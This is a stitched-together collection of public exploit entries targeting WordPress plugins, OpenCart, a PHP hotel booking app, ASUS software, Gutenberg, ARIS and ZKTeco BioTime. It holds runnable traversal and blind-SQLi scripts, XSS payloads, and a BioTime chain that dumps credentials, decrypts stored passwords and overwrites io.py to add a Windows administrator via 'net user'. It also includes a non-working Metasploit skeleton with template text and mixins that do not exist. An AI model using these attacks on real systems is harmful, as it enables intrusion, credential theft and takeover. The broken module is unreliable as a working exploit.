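# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux
#
# NOTE(review): the title says "< 2.7.10" while the Version line says 2.7.10
# and the download link points at 2.7.11; confirm the affected range against
# the plugin changelog before relying on this header.

import sys
import requests
from urllib.parse import urljoin


def _backup_params(file_name, depth):
    """Build the query string for the plugin's backup_manager download handler.

    `depth` copies of "../" are prepended to `file_name` so that the
    download_backup_file value escapes the plugin's backup directory; the
    right depth depends on where that directory sits relative to the file.
    """
    return {
        "page": "backup_manager",
        "download_backup_file": "../" * depth + file_name,
    }


def _local_path(file_name):
    """Return the local filename a downloaded file is written to.

    Path separators in the requested name (e.g. ``etc/passwd``) are flattened
    to underscores so ``open()`` does not fail on a non-existent directory.
    """
    flat = file_name.replace("\\", "/").strip("/").replace("/", "_")
    return f"simplebackup_{flat or 'download'}"


def _is_file_download(response):
    """True when the reply looks like a served file rather than an HTML page."""
    disposition = response.headers.get("Content-Disposition", "")
    length = response.headers.get("Content-Length", "")
    return (
        response.status_code == 200
        and "attachment; filename" in disposition
        and length.isdigit()
        and int(length) > 0
    )


def exploit(target_url, file_name, depth):
    """Fetch `file_name` through the traversal and save it locally.

    Args:
        target_url: Base URL of the WordPress install. Sub-directory installs
            such as ``http://host/blog/`` are respected.
        file_name: Path to fetch once the traversal has escaped the backup
            directory, e.g. ``etc/passwd`` or ``wp-config.php``.
        depth: Number of ``../`` segments to prepend.
    """
    # urljoin() with an absolute path ("/wp-admin/...") would discard any
    # sub-directory in target_url, so join relative to a trailing slash.
    exploit_url = urljoin(target_url.rstrip("/") + "/", "wp-admin/tools.php")

    # No session cookie is sent. If the handler is only reachable when logged
    # in, WordPress redirects to wp-login.php and nothing is downloaded; that
    # case is reported separately below instead of as a wrong depth.
    response = requests.get(exploit_url, params=_backup_params(file_name, depth))

    if not _is_file_download(response):
        if "wp-login.php" in response.url:
            print("Redirected to wp-login.php: the endpoint requires an authenticated session.")
        else:
            print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
        return

    # Shown as text for a quick look; the raw bytes are written to disk below.
    print(response.text)  # Replace with the desired action for the downloaded content

    file_path = _local_path(file_name)
    with open(file_path, "wb") as fh:
        fh.write(response.content)
    print(f"File saved in: {file_path}")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python exploit.py <target_url> <file_name> <depth>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = sys.argv[2]
    try:
        depth = int(sys.argv[3])
    except ValueError:
        print("<depth> must be an integer (number of ../ segments)")
        sys.exit(1)

    print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
    exploit(target_url, file_name, depth)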
# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
# Date: 2024-04-02
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart/releases
# Version: 4.0.2.3
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

* Description :
OpenCart 4.0.2.3 is vulnerable to SQL injection through the 'search' parameter of /index.php?route=product/search&search=. The value reaches the database query without adequate sanitisation. The injection is blind (boolean- and time-based), so data is extracted one condition at a time rather than echoed back directly; the storefront search page does not require a login.
Exploiting this issue could allow an attacker to read or modify data in the store database (for example customer records or administrator password hashes) or to exploit latent vulnerabilities in the underlying database.

* Steps to Reproduce :
- Confirm the endpoint responds: http://127.0.0.1/index.php?route=product/search&search=test
- Run sqlmap against the 'search' parameter (the URL form used by the author is kept below; adjust --level/--risk to the engagement):
sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
===========
Output :
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/search&search=') AND 2427=2427-- drCa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

Note: both payloads close a quoted, parenthesised expression with "')" before appending the condition, which is the shape of the vulnerable query fragment. The advisory gives no vendor fix reference; check OpenCart release notes for versions after 4.0.2.3.
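# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
# Google Dork: n/a
# Date: 04/02/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
# Version: 1.0
# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
# CVE : n/a
#
# Time-based blind SQL injection in the admin login form
# (/hotel booking/admin/login.php, POST field "password"). Each request asks
# the database to sleep(3) when one guessed character of the admin password
# is right, so the value is recovered character by character from the
# response time. No authentication is needed.

import argparse
import string

import requests

# Only two colours are used by the banner; plain ANSI escapes avoid the
# colorama dependency the original pulled in for them.
FR = "\x1b[31m"  # red
FW = "\x1b[37m"  # white

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Filled in from --proxy when run as a script; empty means direct. The
# original always routed through 127.0.0.1:8080, which fails unless an
# interceptor is listening.
proxies = {}

parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
parser.add_argument('-u', '--url', help='Base URL of the target, e.g. http://192.168.1.10')
parser.add_argument('-p', '--proxy', help='Optional HTTP proxy, e.g. http://127.0.0.1:8080')
parser.add_argument('-l', '--length', type=int, default=32, help='Maximum password length to recover')


def banner():
    """Print the tool banner."""
    print(f"""{FR}
 ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄
▪ ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██
 ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌
▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██
 ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•
 Github: https://github.com/offensive-droid
 {FW}
 """)


# Candidate characters, tried in this order: a-z, A-Z, 0-9, '@', '#'.
# A password character outside this set cannot be recovered and ends the
# extraction early.
chars = list(string.ascii_letters + string.digits + '@#')


def sqliPayload(char, position, userid, column, table):
    """Return the injected password value for one (position, char) guess.

    The query sleeps for three seconds when the character of `column` at
    1-based `position` equals `char`. `userid` is accepted for call
    compatibility only: the query keys on uname="admin" and does not use it.
    """
    return (
        f"admin' UNION SELECT IF(SUBSTRING({column},{position},1) = '{char}',"
        f"sleep(3),null) FROM {table} WHERE uname=\"admin\"'"
    )


def postRequest(URL, sqliReq, char, position):
    """Send one guess and return `char` if the server stalled, else ''.

    A response slower than two seconds is taken as the sleep(3) branch
    having fired. Network delays above two seconds give false hits, so
    rerun on a noisy link. `position` is unused and kept for compatibility.
    """
    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
    req = requests.post(url=URL, data=params, verify=False, proxies=proxies, timeout=10)
    elapsed = req.elapsed.total_seconds()
    if elapsed >= 2:
        print("{} : {}".format(char, elapsed))
        return char
    return ''


def theHarvester(target, CHARS, url, max_length=32):
    """Recover `target['column']` of `target['table']` one character at a time.

    For each position the candidates in CHARS are tried until one causes a
    delay; the position counter advances once per position (not once per
    candidate, which was the original bug). Extraction stops at the first
    position with no hit (end of the value or an unsupported character) or
    after `max_length` characters.
    """
    print("Retrieving admin password")
    full_pass = ""
    for position in range(1, max_length + 1):
        found_char = ''
        for char in CHARS:
            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
            found_char = postRequest(url, sqliReq, char, position)
            if found_char:
                break  # no need to try the remaining candidates
        if not found_char:
            break
        full_pass += found_char
    return full_pass


if __name__ == "__main__":
    args = parser.parse_args()
    if not args.url:
        parser.error("-u/--url is required")
    if args.proxy:
        proxies = {'http': args.proxy, 'https': args.proxy}
    banner()
    HOST = str(args.url).rstrip('/')
    PATH = HOST + "/hotel booking/admin/login.php"
    adminPassword = {"id": "1", "table": "manager", "column": "upass"}
    adminPass = theHarvester(adminPassword, chars, PATH, max_length=args.length)
    print("Admin Password:", adminPass)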
# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation
# Date: 2024-04-02
# Exploit Author: Alaa Kachouh
# Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/
# Version: Up to 01.06.15
# Tested on: Windows
# CVE: CVE-2024-27673

===================================================================
ASUS Control Center Express versions up to and including 01.06.15 contain an unquoted service path that lets a local attacker escalate privileges to SYSTEM.

Precondition: the attacker must be able to create a file in the root of C:\. On a default Windows installation standard users may create folders there but not files, so this normally requires a loosened ACL on the volume root or an account that already has elevated rights.

When the "Apro console service" (apro_console.exe) starts, it launches a command whose path contains a space and is not quoted. Windows resolves such a path by trying each space-delimited prefix in turn, so for a path under C:\Program Files\ the file C:\Program.exe is attempted first. A file planted at C:\Program.exe is therefore executed with the service's SYSTEM token the next time the service starts (reboot, manual restart or crash recovery).

The service's own ImagePath is not the unquoted value; the problem is in the path the service invokes during its initialisation, which still results in C:\Program.exe being executed as SYSTEM.

Service Name: AProConsoleService
Binary impacted: apro_console.exe

# If a malicious payload is placed at C:\Program.exe and the service is started in any way, the payload runs with SYSTEM privileges and can perform arbitrary actions on the host.
#############################################
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #
#
# This module requires Metasploit: https://metasploit.com/download
#
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# #
#############################################
#
# NOTE(review): what follows is a Metasploit module skeleton, not a working
# exploit for CVE-2024-21338. Points visible in this file:
#   - the title describes a kernel IOCTL access-control flaw (a local
#     issue), yet the class is Msf::Exploit::Remote with DCERPC mixins and
#     RHOST/RPORT options, and nothing below touches a driver or an IOCTL;
#   - 'Description' and 'Author' still hold template text ("FooBar
#     version 1.0", "You");
#   - Msf::Exploit::Remote::DCERPC::MS08_067::Artifact and
#     impacket_artifact are not defined here and do not appear to exist in
#     metasploit-framework, so the module would not load as written;
#   - datastore['FooBarPayload'] is never registered, so it is nil;
#   - Rex::Post::Meterpreter::RequestError is a Meterpreter session error
#     class, not something a DCERPC call would raise.
# Treat it as a placeholder until real vulnerability logic is written.

require 'msf/core' # legacy require; current modules omit it

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::DCERPC
  # See the review note above: this mixin is not a known framework mixin.
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact

  # Module metadata and options. No 'Payload', 'Targets' or 'Platform'
  # entries are given, so `handler` in #exploit has nothing to stage.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )

    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end

  # Calls the placeholder helper and maps one exception type to
  # CheckCode::Safe; every other outcome is reported as Appears, so this
  # check says nothing about the target.
  def check
    connect

    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Appears
  end

  # Repeats the placeholder call with the unregistered (nil) datastore
  # value, then starts the payload handler and disconnects.
  def exploit
    connect

    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end

    handler
    disconnect
  end
end

# reference : https://nvd.nist.gov/vuln/detail/CVE-2024-21338
## Exploit Title: Wordpress Gutenberg Plugin Version 18.0.0 Stored XSS
### Date: 2024-3-29
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://wordpress.org/plugins/gutenberg/
### Version 18.0.0

1 ) Open a post rendered with the Gutenberg plugin and scroll to its comment form, e.g. https://127.0.0.1/WordPress/2024/03/29/welcome-to-the-gutenberg-editor/#comment-4
2 ) In the "Leave a Reply" field submit the payload:
<sVg/onLy=1 onLoaD=confirm(1)//
3 ) Once the comment is saved, the confirm() dialog fires for anyone who views the post (stored XSS).

Caveat: the write-up does not say which user role posted the comment. WordPress passes comment HTML through wp_kses for accounts without the unfiltered_html capability, which strips <svg> and on* handlers; verify that the payload survives for a subscriber or anonymous commenter, otherwise it is only reproducible by users who are already trusted to post raw HTML.
# Exploit Title: Stored Cross-Site Scripting (XSS) in ARIS: Business Process Management
# Edition Version 10.0.21.0
# Exploit Author: Seid Yassin
# Date: 2024-03-28
# Vendor: Software AG
# Software Link: https://aris.com/
# Version: ARIS: Business Process Management 10.0.21.0

## Description:

The document upload feature does not validate file extensions (or content), so an authenticated user can upload any file type, including malicious ones. To demonstrate this we uploaded an SVG file carrying script: because the application later serves the file inline, the upload becomes a stored cross-site scripting (XSS) vector. The script runs in the browser of any user who opens the document, which can lead to theft of cookies and session tokens or to actions performed on that user's behalf.

## Background:

Cross-site scripting (XSS) is a common web vulnerability that lets an attacker run script in another user's browser in the context of the vulnerable application. Stored XSS means the payload is saved by the application and executes every time a user opens the page (or, as here, the stored file) that contains it.

## Issue:

A stored XSS vulnerability in ARIS: Business Process Management enables a malicious authenticated user to store an XSS payload (inside an SVG file) via the web interface. When another authenticated user or administrator views the file, the JavaScript inside the SVG executes, and any requests it makes are performed with that victim's session.

## Steps To Reproduce:

1. Log into the ARIS application.
2. Navigate to "My tasks", select any task and open the document upload (change request form).
3. Upload an SVG file containing a script, e.g. the sample at
https://gist.github.com/rudSarkar/76f1ce7a65c356a5cd71d058ab76a344

## Expected Result:

After a user uploads a new document in the Change Request Form, the file's link and UUID give direct access to it at {{url}}/documents/api/documents/{{UUID}}/content. The expected behaviour is that content fetched from this path cannot execute script: SVG should be rejected at upload, served as an attachment (Content-Disposition: attachment) or stripped of script elements and event handlers.

## Actual Result:

The SVG is rendered inline at that path and the injected script executes, so the application is vulnerable to stored cross-site scripting.

## Proof of Concept:

Attached Screenshots for the reference.
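# __________.__ ___________.__
# \______ \__| ___\__ ___/|__| _____ ____
# | | _/ |/ _ \| | | |/ \_/ __ \
# | | \ ( <_> ) | | | Y Y \ ___/
# |______ /__|\____/|____| |__|__|_| /\___ >
# \/ \/ \/
# Tested on 8.5.5 (Build:20231103.R1905)
# Tested on 9.0.1 (Build:20240108.18753)
# BioTime, "time" for shellz!
# https://claroty.com/team82/disclosure-dashboard/cve-2023-38952
# https://claroty.com/team82/disclosure-dashboard/cve-2023-38951
# https://claroty.com/team82/disclosure-dashboard/cve-2023-38950
# RCE by adding a user to the system, not the app.
# Relay machine creds over smb, while creating a backup
# Decrypt SMTP, LDAP or SFTP creds, if any.
# Get sql backup. Good luck cracking those hashes!
# Can use Banner to determine which version is running
# Server: Apache/2.4.29 (Win64) mod_wsgi/4.5.24 Python/2.7
# Server: Apache/2.4.52 (Win64) mod_wsgi/4.7.1 Python/3.7
# Server: Apache/2.4.48 (Win64) mod_wsgi/4.7.1 Python/3.7
# Server: Apache => BioTime Version 9
# @w3bd3vil - Krash Consulting (https://krashconsulting.com/fury-of-fingers-biotime-rce/)
#
# Flow of this script (each step prints what it found):
#   1. fingerprint the version from the unauthenticated /license/ page
#   2. read files through the unauthenticated /iclock/file traversal and
#      decrypt the RC4 passwords in attsite.ini
#   3. log in as employee 1..9 with the default password 123456
#   4. download (or create, then download) a database backup
#   5. dump SMTP/LDAP settings, decrypting the AES-stored passwords
#   6. on 8.5.5 / 9.x, write a Python payload over the server's io.py via
#      the SFTP-settings traversal (adds a local Windows admin user)
#
# CAUTION: step 6 overwrites a standard-library file on the target and the
# payload creates a local account. The product itself runs on Python (see
# the Server banners above), so expect it to stop working until io.py is
# restored. Use only with authorisation.
import base64
import json
import os
import sys
from binascii import a2b_hex, b2a_hex

import requests
from bs4 import BeautifulSoup
from Crypto.Cipher import AES, ARC4

requests.packages.urllib3.disable_warnings()

# Fill in e.g. {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# to watch the traffic in an interceptor; empty means direct.
proxies = {}

if len(sys.argv) != 2:
    print("Usage: python biotime.py <http(s)://target[:port]>")
    sys.exit(1)
target = sys.argv[1].rstrip('/')


def decrypt_rc4(base64_encoded_rc4, password="biotime"):
    """Decrypt a base64-encoded RC4 blob from attsite.ini.

    BioTime protects config-file passwords with RC4 under the fixed key
    "biotime", so anyone who can read the file can recover them
    (e.g. decrypt_rc4("fj8xD5fAY6r6s3I=")).
    """
    encrypted_data = base64.b64decode(base64_encoded_rc4)
    cipher = ARC4.new(password.encode())
    return cipher.decrypt(encrypted_data).decode()


# Static AES key (24 bytes -> AES-192) and IV used for passwords kept in the
# application's database (SMTP/LDAP settings). Being hard-coded, they offer
# no protection once the ciphertext can be read through the API.
AES_PASSWORD = b'china@2018encryption#aes'
AES_IV = b'zkteco@china2019'


def filling_data(data, restore=False):
    """PKCS#7-style padding helper for str data.

    With restore=False pad `data` to a multiple of AES.block_size using
    chr(pad_len) characters; with restore=True strip that padding again.
    """
    if restore:
        return data[0:-ord(data[-1])]
    block_size = AES.block_size
    pad_len = block_size - len(data) % block_size
    return data + pad_len * chr(pad_len)


def aes_encrypt(content):
    """Encrypt str/bytes `content` the way BioTime does; returns hex text."""
    if isinstance(content, bytes):
        content = str(content, 'utf-8')
    cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)
    encrypted = cipher.encrypt(filling_data(content).encode('utf-8'))
    return b2a_hex(encrypted).decode('utf-8')


def aes_decrypt(content):
    """Decrypt a hex string produced by aes_encrypt(); returns str."""
    if isinstance(content, str):
        content = content.encode('utf-8')
    cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)
    result = cipher.decrypt(a2b_hex(content)).decode('utf-8')
    return filling_data(result, restore=True)


def _auth_cookies():
    """Cookies for authenticated calls, built from the current globals."""
    return {'sessionid': session_id_cookie, 'csrftoken': csrf_token_value}


# --- 1. Fingerprint the target via the unauthenticated /license/ page ---
response = requests.get(f'{target}/license/', proxies=proxies, verify=False)
soup = BeautifulSoup(response.content, 'html.parser')
build_lines = [line.strip() for line in soup.get_text().split('\n') if 'build' in line.lower()]
if not build_lines:
    print("Unsupported Target!")
    sys.exit(1)
build = build_lines[0]
print(f"Found BioTime: {build}")
# First character of the matched line is the major version ("8" or "9");
# later steps branch on it.
buildNumber = build[0]


# --- 2. Unauthenticated path traversal in /iclock/file ---
def _read_file(sn, path):
    """Fetch `path` through the traversal; return decoded text or None.

    The endpoint returns the file base64-encoded. None covers transport
    errors and replies that are not base64 / not UTF-8 (e.g. an error page).
    """
    url = f'{target}/iclock/file?SN={sn}&url=/../../../../../../../../{path}'
    try:
        reply = requests.get(url, proxies=proxies, verify=False)
        return base64.b64decode(reply.text).decode('utf-8')
    except (requests.RequestException, ValueError, UnicodeDecodeError):
        return None


print("Dir Traversal Attempt\nOutput of windows/win.ini file:")
win_ini = _read_file('win', 'windows/win.ini')  # harmless existence check
if win_ini is None:
    print("Couldn't exploit Dir Traversal")
else:
    print(win_ini)
    # attsite.ini holds the app config, including RC4'd passwords; the
    # install directory differs between product generations.
    attConfig = _read_file('att', 'biotime/attsite.ini') or _read_file('att', 'zkbiotime/attsite.ini')
    if attConfig is None:
        print("Couldn't get BioTime config file (possibly non default configuration)")
    else:
        lines = attConfig.split('\n')
        for i, line in enumerate(lines):
            # Passwords are stored as "...PASSWORD=@!@=<base64 RC4>"; decrypt in place.
            if "PASSWORD=@!@=" in line:
                prefix, _, blob = line.partition("@!@=")
                try:
                    lines[i] = prefix + decrypt_rc4(blob)
                except (ValueError, UnicodeDecodeError):
                    pass  # leave the raw value if it does not decrypt cleanly
        print("Output of BioTime Decrypted config file:\n" + '\n'.join(lines))


# --- 3. Grab the CSRF token and session from the login page, then try defaults ---
login_url = f'{target}/login/'
response = requests.get(login_url, proxies=proxies, verify=False)
if response.status_code != 200:
    print(f"Failed to retrieve data from {login_url}. Status code: {response.status_code}")
    sys.exit(1)

soup = BeautifulSoup(response.text, 'html.parser')
csrf_input = soup.find('input', {'name': 'csrfmiddlewaretoken'})
if csrf_input is None:
    print("Login page has no csrfmiddlewaretoken field; cannot continue.")
    sys.exit(1)
csrf_token_header_value = csrf_input['value']
print(f"CSRF Token Header: {csrf_token_header_value}")

session_id_cookie = response.cookies.get('sessionid')
if session_id_cookie:
    print(f"Session ID: {session_id_cookie}")
csrf_token_value = response.cookies.get('csrftoken')
if csrf_token_value:
    print(f"CSRF Token Cookie: {csrf_token_value}")

# Login Now! Employee accounts are numeric; 1..9 with the default password.
password = '123456'  # Default password!
logged_in = False
for username in range(1, 10):
    data = {
        'username': username,
        'password': password,
        'captcha': '',
        'login_user': 'employee',
    }
    headers = {
        'User-Agent': 'Krash Consulting',
        'X-CSRFToken': csrf_token_header_value,
    }
    response = requests.post(login_url, data=data, cookies=_auth_cookies(), headers=headers,
                             proxies=proxies, verify=False)
    if response.status_code != 200:
        continue
    try:
        ret_value = response.json().get('ret')
    except ValueError:
        continue  # not JSON (e.g. an HTML error page)
    if ret_value == 0:
        print(f"Valid Credentials found: Username is {username} and password is {password}")
        # Keep the pre-login cookies if the reply does not rotate them.
        session_id_cookie = response.cookies.get('sessionid') or session_id_cookie
        csrf_token_value = response.cookies.get('csrftoken') or csrf_token_value
        print(f"Auth Session ID: {session_id_cookie}")
        print(f"Auth CSRF Token Cookie: {csrf_token_value}")
        logged_in = True
        break

# Tracked with a flag: the original tested `i == 9`, which also fired when
# user 9 was the valid account.
if not logged_in:
    print("No valid users found!")
    sys.exit(1)


# --- 4. Backups ---
def downloadBackup():
    """Download the newest database backup from /files/.

    Returns True when the target has no backups yet (the caller then creates
    one and calls this again) and False otherwise, whether or not the
    download succeeded.
    """
    list_url = f'{target}/base/dbbackuplog/table/?page=1&limit=33'

    def latest_backup():
        reply = requests.get(list_url, cookies=_auth_cookies(), proxies=proxies, verify=False)
        listing = reply.json()
        print("Backup files list")
        print(json.dumps(listing, indent=4))
        if listing.get('count', 0) > 0 and listing.get('data'):
            return listing['data'][0]  # Latest Backup
        return None

    backup_info = latest_backup()
    if backup_info is None:
        print("No backup Found!")
        return True

    if buildNumber == "9":
        # v9 backups are password protected: create one with a password we
        # know and re-list so the entry downloaded is that new backup (if it
        # has not been listed yet, the previous one is downloaded instead).
        createBackup()
        print("Backup File password: Krash")
        backup_info = latest_backup() or backup_info

    backup_file = backup_info['backup_file']
    print("Operator:", backup_info['operator'])
    print("Backup File:", backup_file)
    print("Database Type:", backup_info['db_type'])

    # backup_file is a Windows path; everything below the "files" directory
    # is reachable as /files/<relative path>. Split on both separators so
    # this also works when the script runs on Linux (os.sep would not split
    # a backslash path there).
    parts = backup_file.replace('\\', '/').split('/')
    if 'files' not in parts:
        print("Backup path does not contain a 'files' directory; cannot map it to a URL.")
        return False
    relative_path = '/'.join(parts[parts.index('files') + 1:])

    url = f'{target}/files/{relative_path}'
    print(url)
    # Fetched without cookies: /files/ is served without authentication.
    reply = requests.get(url, proxies=proxies, verify=False)
    if reply.status_code != 200:
        print("Failed to download the file. Status code:", reply.status_code)
        return False
    filename = os.path.basename(url)
    with open(filename, 'wb') as file:
        file.write(reply.content)
    print(f"File '{filename}' downloaded successfully.")
    return False


def createBackup(targetPath=None):
    """Trigger a manual database backup into `targetPath` on the server.

    `targetPath` defaults to the product's own files\\backup (9.x and 8.5.5)
    or files\\fw (older 8.x) directory so the result is fetchable through
    downloadBackup(). A UNC path (see the commented-out call at the end of
    the file) makes the server authenticate to that share instead, which is
    the credential-relay angle. On 9.x the backup is created with the
    password "Krash".
    """
    print("Attempting to create backup.")
    action = '44424261636b75704d616e75616c6c79'  # hex for "DBBackupManually"
    url = f'{target}/base/dbbackuplog/action/?action_name={action}&_popup=true&id='
    reply = requests.get(url, cookies=_auth_cookies(), proxies=proxies, verify=False)
    soup = BeautifulSoup(reply.content, 'html.parser')
    # Best-effort hint only; get_text() drops markup, so this is often empty.
    pathBackup = [line.strip() for line in soup.get_text().split('\n') if 'name="file_path"' in line.lower()]
    print(f"Possible backup location: {pathBackup}")

    url = f'{target}/base/dbbackuplog/action/'
    if targetPath is None:
        if buildNumber == "9" or build[:5] == "8.5.5":
            targetPath = "C:\\ZKBioTime\\files\\backup\\"
        else:
            targetPath = "C:\\BioTime\\files\\fw\\"
    data = {
        'csrfmiddlewaretoken': csrf_token_value,
        'file_path': targetPath,
        'action_name': action,
    }
    if buildNumber == "9":
        # presumably choice 2 = password-protected backup
        data['backup_encryption_choices'] = '2'
        data['auto_backup_password'] = 'Krash'
    reply = requests.post(url, cookies=_auth_cookies(), data=data, proxies=proxies, verify=False)
    if reply.status_code == 200:
        print("Backup Initiated.")
    else:
        print("Backup failed!")


if downloadBackup():
    createBackup()
    downloadBackup()


# --- 5. SMTP / LDAP settings with AES-stored passwords ---
def _dump_settings(label, endpoint):
    """Print a settings object from the API, decrypting any *password* field."""
    reply = requests.get(f'{target}{endpoint}', cookies=_auth_cookies(), proxies=proxies, verify=False)
    if reply.status_code != 200:
        print(f"{label}: request failed with status {reply.status_code}")
        return
    response_data = reply.json()
    print(label)
    for key, value in response_data.items():
        # Empty values would make filling_data() index into '' - skip them.
        if 'password' in key.lower() and value:
            try:
                response_data[key] = aes_decrypt(value)
            except (ValueError, UnicodeDecodeError, IndexError):
                pass  # not hex / not padded as expected: keep the raw value
    print(json.dumps(response_data, indent=4))


_dump_settings("SMTP Settings", '/base/api/systemSettings/email_setting/')
_dump_settings("LDAP Settings", '/base/api/systemSettings/ldap_setup/')


# --- 6. RCE through the SFTP settings ---
def sftpRCE(myIpaddr='192.168.0.11', myUser='test', myPassword='test@123'):
    """Write a Python payload over the server's io.py via the SFTP settings.

    An SFTP setting is created (the original note says the host and
    credentials need to be valid, so point them at an SFTP server you
    control), then edited with a user_name that traverses to
    <python>\\lib\\io.py so the uploaded "key" is written there, and finally
    deleted. The payload runs as soon as the server's Python next imports
    io, adding local user omair190 (see the note on the truncated command).
    """
    print("Attempting RCE!")
    # Add SFTP, Need valid IP/credentials here!
    print("Adding FTP List")
    url = f'{target}/base/sftpsetting/add/'
    data = {
        'csrfmiddlewaretoken': csrf_token_value,
        'host': myIpaddr,
        'port': 22,
        'is_sftp': 1,
        'user_name': myUser,
        'user_password': myPassword,
        'user_key': '',
        'action_name': '47656e6572616c416374696f6e4e6577',  # hex for "GeneralActionNew"
    }
    reply = requests.post(url, cookies=_auth_cookies(), data=data, proxies=proxies, verify=False)
    print(reply)

    url = f'{target}/base/sftpsetting/table/?page=1&limit=33'
    reply = requests.get(url, cookies=_auth_cookies(), proxies=proxies, verify=False)
    response_data = reply.json()
    print("FTP List")
    print(json.dumps(response_data, indent=4))
    if not response_data.get('data'):
        print("No SFTP entry was created; cannot continue.")
        return
    getID = response_data['data'][0]['id']  # Latest SFTP
    print("ID to edit ", getID)

    # Edit SFTP (Response can have errors, it doesn't matter)
    print("Editing SFTP Settings")
    # Raw strings: '\..' is not an escape, so the original worked by
    # accident and warns on Python 3.12+.
    if buildNumber == "9":
        dirTraverse = r'\..\..\..\python311\lib\io.py'
    else:
        dirTraverse = r'\..\..\..\python37\lib\io.py'
    # The user_name field is limited to 30 characters (author's finding).
    if len(dirTraverse) > 30:
        print("Directory Traversal length is greater than 30, will not work!")
        sys.exit(1)

    url = f'{target}/base/sftpsetting/edit/'
    data = {
        'csrfmiddlewaretoken': csrf_token_value,
        'host': myIpaddr,
        'port': 22,
        'is_sftp': 1,
        'user_name': dirTraverse,
        'user_password': myPassword,
        # NOTE(review): the payload is truncated in this listing ("...");
        # complete the `net localgroup administrators` command (add the new
        # user to the group) before running this.
        'user_key': 'import os\nos.system("net user /add omair190 KCP@ssw0rd && net localgroup administrators ...',
        'obj_id': getID,
    }
    requests.post(url, cookies=_auth_cookies(), data=data, proxies=proxies, verify=False)
    print("A new user should be added now on the server \nusername: omair190\npassword: KCP@ssw0rd")

    # Delete SFTP
    print("Deleting SFTP Settings")
    url = f'{target}/base/sftpsetting/action/'
    data = {
        'csrfmiddlewaretoken': csrf_token_value,
        'id': getID,
        'action_name': '47656e6572616c416374696f6e44656c657465',  # hex for "GeneralActionDelete"
    }
    requests.post(url, cookies=_auth_cookies(), data=data, proxies=proxies, verify=False)


# RCE
if buildNumber == "9" or build[:5] == "8.5.5":
    sftpRCE()

# Relay Creds: point the backup at a share you control to capture the
# machine account's NTLM authentication, e.g.
# createBackup("\\\\192.168.0.11\\KC\\test")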
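# Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version
# Date: 21.01.2024
# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24724
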